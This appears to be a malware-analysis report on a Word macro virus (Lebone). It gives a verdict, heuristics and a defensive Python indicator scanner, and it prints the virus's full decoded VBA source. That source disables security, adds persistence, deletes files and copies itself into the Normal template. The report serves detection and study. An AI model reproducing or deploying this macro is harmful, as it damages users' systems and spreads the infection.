Verdict: MALICIOUS (risk score 256)

Malware Insights

MITRE ATT&CK
- T1547.001 Registry Run Keys / Startup Folder
- T1059.005 Visual Basic
This Word document carries legacy WordBasic macro-virus markers together with a VBA project whose module "Libon" implements the Lebone macro virus (its own comments date it to 2005 and are written in Portuguese). The AutoOpen procedure first switches off Word's macro virus protection and the prompts for conversions and for saving the Normal template (which would otherwise reveal the infection), shows an alarming message box ("Virus altered your computer!!"), and then uses System.PrivateProfileString with an empty file name, which makes Word write straight to the registry: it sets the Word 2000 (Office 9.0) macro security level to 1 (Low), sets DisableTaskMgr and DisableRegistryTools under HKCU\...\Policies\System to hinder user intervention, overwrites the branding values under HKLM\...\CurrentVersion, and adds a Run value pointing at C:\ARQUIV~1\Lube.html (ARQUIV~1 is the 8.3 short name of the Portuguese-locale Program Files folder), a red "Macro virus!" marquee page the macro itself writes to disk. It then deletes *.exe and *.com files from C:\WINDOWS, C:\WINDOWS\SYSTEM and C:\WINDOWS\COMMAND unconditionally, and on the 6th, 13th, 17th, 23rd and 28th of the month also deletes *.com, *.ini, *.txt, *.gif, *.xls and *.pdf files from C:\ and C:\WINDOWS after a second message box. The AutoClose procedure saves copies of the document as .sys files in four locations and, if no "Libon" macro is already installed, uses WordBasic.MacroCopy to copy the module into the global template ("Global:Libon"), which is the replication step; a Toolsmacro procedure overrides the Tools > Macro command to disable the "Security..." menu item. The hard-coded Windows 9x paths and the HKLM writes will largely fail on a modern, non-administrative system, but the HKCU policy writes, the Office security downgrade and the Normal-template infection still work wherever the macro is allowed to run. ClamAV detects the container as Win.Trojan.Pivis-2 and the extracted macro module as Doc.Trojan.Lebone-1, which corroborates the static findings.
Heuristics (6)

- ClamAV: Win.Trojan.Pivis-2 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.Pivis-2
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- VBA macro-virus self-replication / AV tampering (critical, OLE_VBA_MACRO_VIRUS_REPLICATION): VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature. Matched line in script: `.VirusProtection = False`. In this sample the copy into the global template is done with the legacy WordBasic.MacroCopy call rather than the VBE object model.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): Matched line in script: `Sub AutoOpen()`
- Auto_Close macro (low, OLE_VBA_AUTOCLOSE): Matched line in script: `Sub AutoClose()`
- Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS): OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them. Here the WordBasic calls (MacroCopy, CountMacros, MacroName$, Kill) are made from a converted VBA project through the WordBasic object, so olevba did recover the source; the rule still fires on the legacy markers and the Toolsmacro override.
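As an added worked example (not part of the analyzer's code or of the sample), the following Python script re-implements in miniature the kind of source-level checks the heuristics above describe, run over a constructed excerpt of this page's macro. It parses the `System.PrivateProfileString("", "HKEY_...", "name") = value` assignments, which with an empty file name are direct registry writes, and classifies them by target key (Office security level, Policies\System lockouts, Run-key persistence, other), alongside checks for auto-exec procedures, `VirusProtection = False`, `MacroCopy` into the global template, `WordBasic.Kill` deletions and the disabled "Security..." menu item. The rule names, severities and the verdict thresholds are this example's own choices, not the analyzer's.

```python
"""Indicator scan over VBA source extracted by olevba (e.g. macros.bas).

Added example; rule names and severities are assumptions of this example,
not the analyzer's. Run as a script to print a report, or import scan().
"""
from __future__ import annotations

import re
import sys
from collections import Counter
from dataclasses import dataclass

# Constructed sample: lines taken from the macro shown on this page, enough
# to exercise every check below.
SAMPLE = r'''
Sub AutoOpen()
On Error Resume Next
With Options
.VirusProtection = False
.SaveNormalPrompt = False
End With
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr") = "1"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "RegisteredOwner") = "Astral"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Visual") = "C:\ARQUIV~1\Lube.html"
WordBasic.Kill "C:\WINDOWS\*.exe"
End Sub
Sub AutoClose()
WordBasic.MacroCopy sMacro$, "Global:Libon"
End Sub
Sub Toolsmacro()
CommandBars("Macro").Controls("Security...").Enabled = False
End Sub
'''


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    line: int
    evidence: str


# Procedures Word runs automatically (classic and Document_* event forms).
AUTO_EXEC = re.compile(
    r"^\s*(?:Public\s+|Private\s+)?Sub\s+"
    r"(AutoOpen|AutoClose|AutoExec|AutoNew|AutoExit|Document_Open|Document_Close)\s*\(",
    re.IGNORECASE,
)
VIRUS_PROTECTION_OFF = re.compile(r"\.VirusProtection\s*=\s*False", re.IGNORECASE)
# PrivateProfileString with an empty file name and an HKEY_ path writes the registry.
REG_WRITE = re.compile(
    r'PrivateProfileString\(\s*""\s*,\s*"(HKEY_[^"]+)"\s*,\s*"([^"]+)"\s*\)\s*=\s*(.+?)\s*$',
    re.IGNORECASE,
)
MACRO_COPY_GLOBAL = re.compile(r'WordBasic\.MacroCopy\b.*"Global:', re.IGNORECASE)
WORDBASIC_KILL = re.compile(r'WordBasic\.Kill\s+"([^"]+)"', re.IGNORECASE)
SECURITY_MENU_OFF = re.compile(r'Controls\("Security\.\.\."\)\.Enabled\s*=\s*False', re.IGNORECASE)


def classify_registry_write(path: str, name: str) -> tuple[str, str]:
    """Map a registry key path and value name to (rule, severity)."""
    p, n = path.lower(), name.lower()
    if p.endswith("\\policies\\system") and n in ("disabletaskmgr", "disableregistrytools"):
        return "user_control_lockout", "high"
    if p.endswith("\\currentversion\\run") or p.endswith("\\currentversion\\runonce"):
        return "run_key_persistence", "high"
    if "\\office\\" in p and p.endswith("\\security") and n == "level":
        return "macro_security_downgrade", "critical"
    return "registry_write", "medium"


def scan(source: str) -> list[Finding]:
    """Return one Finding per matched indicator, with the 1-based source line."""
    findings: list[Finding] = []
    for lineno, raw in enumerate(source.splitlines(), start=1):
        line = raw.strip()
        if m := AUTO_EXEC.match(line):
            findings.append(Finding("auto_exec", "low", lineno, m.group(1)))
        if VIRUS_PROTECTION_OFF.search(line):
            findings.append(Finding("virus_protection_off", "critical", lineno, line))
        if m := REG_WRITE.search(line):
            path, name, value = m.groups()
            rule, sev = classify_registry_write(path, name)
            findings.append(Finding(rule, sev, lineno, f"{path}\\{name} = {value}"))
        if MACRO_COPY_GLOBAL.search(line):
            findings.append(Finding("global_template_replication", "critical", lineno, line))
        if m := WORDBASIC_KILL.search(line):
            findings.append(Finding("file_deletion", "high", lineno, m.group(1)))
        if SECURITY_MENU_OFF.search(line):
            findings.append(Finding("security_menu_disabled", "high", lineno, line))
    return findings


def summarize(findings: list[Finding]) -> dict[str, int]:
    """Count findings per rule."""
    return dict(Counter(f.rule for f in findings))


def verdict(findings: list[Finding]) -> str:
    """Replication or AV tampering is decisive; auto-exec plus anything else is suspicious."""
    rules = {f.rule for f in findings}
    if "global_template_replication" in rules or "virus_protection_off" in rules:
        return "macro-virus"
    if "auto_exec" in rules and rules - {"auto_exec"}:
        return "suspicious"
    return "clean"


if __name__ == "__main__":
    text = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE
    found = scan(text)
    for f in found:
        print(f"{f.severity:8} {f.rule:28} line {f.line}: {f.evidence}")
    print("verdict:", verdict(found), summarize(found))
```

Run it with the extracted `macros.bas` as the only argument, or with no argument to scan the embedded excerpt. The registry classifier is deliberately path-based rather than keyed on the exact value names this sample uses, so the same check catches a Run-key write to any value name or a security-level downgrade for any Office version.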
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | Detection | Obfuscation or payload |
|---|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6205 bytes | af839db6b45e6ff490a7893aca61778c81f3a6d64633aa7c3ecb7847e7f1c097 | ClamAV: Doc.Trojan.Lebone-1 | unlikely |
Preview script (first 1,000 lines of the extracted script)

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Libon"
'Macro virus name: Lebone
'-------------------------
'Infecta documentos word.
'Infect word documents.
'2005
'-------------------------
Sub AutoOpen()
Attribute AutoOpen.VB_Description = "Macro Lebone"
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Project.Libon.AutoOpen"
On Error Resume Next
With Options
.ConfirmConversions = False
.VirusProtection = False
.SaveNormalPrompt = False
End With
MsgBox " Virus alterou seu computador !!", vbOKOnly + vbCritical, "Word texto informa!!"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr") = "1"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools") = "1"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "Lune") = "Virus ativado"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "RegisteredOrganization") = "Universal"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "RegisteredOwner") = "Astral"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "Version") = "13A31-Infected "
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "VersionNumber") = "1313BA13 Astral "
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "ProductName") = "Electron"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Visual") = "C:\ARQUIV~1\Lube.html"
Open "C:\ARQUIV~1\Lube.html" For Output As #1
Print #1, "<html><head><title>Macro virus!</title></head><body bgcolor='#FF0000' link='#FFFF00' vlink='#FF0000'>"
Print #1, "<h6 align='center'><font color='#EEEE00' size='15'><marquee behavior='alternate' width='90%'>Computador com problemas!</marquee></font>"
Print #1, "<h6 align='center'><font color=blue size='7'><marquee behavior='alternate' width='100%'>##############################################</marquee></font>"
Print #1, "<h6 align='center'><font color='#000000' size='15'><marquee behavior='alternate' width='90%'>Word modificado com sucesso!</marquee></font>"
Print #1, "<h6 align='center'><font color=blue size='7'><marquee behavior='alternate' width='100%'>###############################################</marquee></font>"
Print #1, "<h6 align='center'><font color='#00FF00' size='15'><marquee behavior='alternate' width='70%'>Word macro virus!</marquee></font>"
Print #1, "<h6 align='center'><font color=blue size='7'><marquee behavior='alternate' width='100%'>###############################################</marquee></font>"
Print #1, "<h6 align='center'><font color=blue size='7'><marquee behavior='alternate' width='100%'>###############################################</marquee></font>"
Print #1, "<h6 align='center'><font color=blue size='7'><marquee behavior='alternate' width='100%'>###############################################</marquee></font>"
Print #1, "<h6 align='center'><font color=blue size='7'><marquee behavior='alternate' width='100%'>###############################################</marquee></font>"
Close #1
ActiveDocument.Shapes.AddTextEffect _
PresetTextEffect:=msoTextEffect9, _
Text:="A vida pode ser feliz!!", FontName:="Arial Black", _
FontSize:=36, FontBold:=msoTrue, _
FontItalic:=msoFalse, Left:=1, Top:=1, _
Anchor:=ActiveDocument.Paragraphs(1).Range
WordBasic.Kill "C:\WINDOWS\*.exe"
WordBasic.Kill "C:\WINDOWS\SYSTEM\*.exe"
WordBasic.Kill "C:\WINDOWS\COMMAND\*.exe"
WordBasic.Kill "C:\WINDOWS\*.com"
WordBasic.Kill "C:\WINDOWS\COMMAND\*.com"
If Day(Now()) = 6 Or (Day(Now)) = 13 Or (Day(Now)) = 17 Or (Day(Now)) = 23 Or (Day(Now)) = 28 Then
MsgBox " Virus modificou seus arquivos!!", vbOKOnly + vbCritical, "Word texto informa!!"
WordBasic.Kill "C:\WINDOWS\*.com"
WordBasic.Kill "C:\WINDOWS\*.ini"
WordBasic.Kill "C:\WINDOWS\*.txt"
WordBasic.Kill "C:\WINDOWS\*.gif"
WordBasic.Kill "C:\WINDOWS\*.xls"
WordBasic.Kill "C:\WINDOWS\*.pdf"
WordBasic.Kill "C:\*.com"
WordBasic.Kill "C:\*.ini"
WordBasic.Kill "C:\*.txt"
WordBasic.Kill "C:\*.gif"
WordBasic.Kill "C:\*.xls"
WordBasic.Kill "C:\*.pdf"
End If
End Sub
Sub AutoClose()
Attribute AutoClose.VB_Description = "Macro Lebone"
Attribute AutoClose.VB_ProcData.VB_Invoke_Func = "Project.Libon.AutoClose"
On Error Resume Next
ActiveDocument.SaveAs FileName:="C:\Lubir.sys"
ActiveDocument.SaveAs FileName:="C:\Windows\System\Igon.sys"
ActiveDocument.SaveAs FileName:="C:\Program Files\Lubi.sys"
ActiveDocument.SaveAs FileName:="C:\Windows\Command\Nidun.sys"
iMacroCount = WordBasic.CountMacros(0, 0)
For i = 1 To iMacroCount
If WordBasic.[MacroName$](i, 0, 0) = "Libon" Then
binstalled = -1
End If
If WordBasic.[MacroName$](i, 0, 0) = "Libon" Then
bTooMuchTrouble = -1
End If
Next i
If Not binstalled And Not bTooMuchTrouble Then
sMe$ = WordBasic.[FileName$]()
sMacro$ = sMe$ + ":Libon"
WordBasic.MacroCopy sMacro$, "Global:Libon"
sMacro$ = sMe$ + ":AutoClose"
WordBasic.MacroCopy sMacro$, "Global:Libon"
ActiveDocument.Save
End If
End Sub
Sub Toolsmacro()
Attribute Toolsmacro.VB_Description = "Macro Lebone"
Attribute Toolsmacro.VB_ProcData.VB_Invoke_Func = "Project.Libon.macro"
On Error Resume Next
CommandBars("Macro").Controls("Security...").Enabled = False
End Sub
'Infecta documentos word.
'Infect word documents.
'Word Macro virus
'=========================
'Ano 2005
'-------------------------
```

The Portuguese strings in the script read, in order: "Virus altered your computer!!" / "Word text informs!!" (message box), "Virus activated" (registry value), "Computer with problems!", "Word modified successfully!" (the dropped HTML page), "Life can be happy!!" (the WordArt shape), "Virus modified your files!!" (second message box), and "Infects Word documents." / "Year 2005" (comments).